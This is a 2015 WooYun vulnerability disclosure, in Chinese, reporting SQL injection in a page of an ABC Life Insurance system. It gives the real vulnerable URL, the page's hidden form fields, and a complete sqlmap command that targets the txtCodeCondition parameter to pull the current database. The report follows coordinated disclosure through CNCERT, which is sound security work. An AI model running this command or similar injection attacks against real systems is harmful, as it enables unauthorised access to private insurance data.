当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119996

漏洞标题:农银人寿某系统一个不起眼的页面引发的SQL注射

相关厂商:农银人寿

漏洞作者: 茜茜公主

提交时间:2015-06-12 15:52

修复时间:2015-07-31 11:46

公开时间:2015-07-31 11:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-12: 细节已通知厂商并且等待厂商处理中
2015-06-16: 厂商已经确认,细节仅向厂商公开
2015-06-26: 细节向核心白帽子及相关领域专家公开
2015-07-06: 细节向普通白帽子公开
2015-07-16: 细节向实习白帽子公开
2015-07-31: 细节向公众公开

简要描述:

一个不起眼的页面引发的SQL注射

详细说明:

农银人寿保险股份有限公司(简称农银人寿)是由中国农业银行股份有限公司、北京中关村科学城建设股份有限公司等公司强强合作打造,并在国家工商行政管理总局注册的全国性人寿保险公司。公司总部位于北京,并在北京、浙江、辽宁、山东、福建、湖南、四川、江苏、陕西、河北、湖北、山西、河南、安徽、宁波、苏州、广东、上海、厦门和黑龙江设立了包括20家分公司在内的逾300家分支机构。
作为中国农业银行的控股子公司,农银人寿将依托中国农业银行雄厚的资金实力、庞大的经营网络、完善的金融服务和卓越的社会信誉,为客户提供高品质的保险保障和财富规划服务。
地址:http://remotebak.abchinalife.cn:7060/ui

QQ截图20150611095155.jpg


QQ截图20150612140300.jpg


在打开网站的时候有这么个链接
http://remotebak.abchinalife.cn:7060/ui/common/cvar/CExec.jsp

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=GBK">
</head>
<form name='fm' action='CExec.jsp' method='POST'>
<input type='hidden' name='txtVarData' value=''>
<input type='hidden' name='txtCodeName' value=''>
<input type='hidden' name='txtOther'>
<input type='hidden' name='txtFrameName'>
<input type='hidden' name='txtSQL'>
<input type='hidden' name='startIndex'>
<input type='hidden' name='txtQueryResult'>
<input type='hidden' name='mOperate'>
<input type='hidden' name='txtCodeCondition'>
<input type='hidden' name='txtConditionField'>
<input type='hidden' name='txtShowWidth'>
</form>
<SCRIPT language="JavaScript1.2">
window.status="finished";
try
{
top.achieveEX = true; //用于判断页面初始化完成
}
catch(ex)
{}
</SCRIPT>
</html>


所以,我构造了一下

python SQLMap/SQLMap.py -u "http://remotebak.abchinalife.cn:7060/ui/common/cvar/CExec.jsp" --data "txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044" -p txtCodeCondition --risk 3 --level 3 --current-db


Parameter: txtCodeCondition (POST)


QQ截图20150612140629.jpg

漏洞证明:

QQ截图20150612140656.jpg


QQ截图20150612140721.jpg


QQ截图20150612140844.jpg


随便找个表看看

QQ截图20150612141039.jpg

修复方案:

过滤

版权声明:转载请注明来源 茜茜公主@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-06-16 11:45

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT通报,由其后续协调管理单位处置.

最新状态:

暂无